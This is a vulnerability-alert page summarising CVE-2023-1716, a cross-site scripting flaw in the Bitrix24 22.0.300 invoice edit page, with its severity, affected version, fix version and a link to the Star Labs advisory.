First published: Wed Nov 01 2023(Updated: )
Cross-site scripting (XSS) vulnerability in Invoice Edit Page in Bitrix24 22.0.300 allows attackers to execute arbitrary JavaScript code in the victim's browser, and possibly execute arbitrary PHP code on the server if the victim has administrator privilege.
Credit: info@starlabs.sg
Affected Software | Affected Version | How to fix |
---|---|---|
Bitrix24 Bitrix24 | =22.0.300 |
Sign up to SecAlerts for real-time vulnerability data matched to your software, aggregated from hundreds of sources.
CVE-2023-1716 is a cross-site scripting (XSS) vulnerability in the Invoice Edit Page of Bitrix24 22.0.300.
CVE-2023-1716 allows attackers to execute arbitrary JavaScript code in the victim's browser and possibly execute arbitrary PHP code on the server if the victim has administrator privilege.
CVE-2023-1716 has a severity rating of 9, which is considered critical.
To fix CVE-2023-1716, it is recommended to update Bitrix24 to version 22.0.301 or later.
You can find more information about CVE-2023-1716 on the Star Labs advisory page: https://starlabs.sg/advisories/23/23-1716/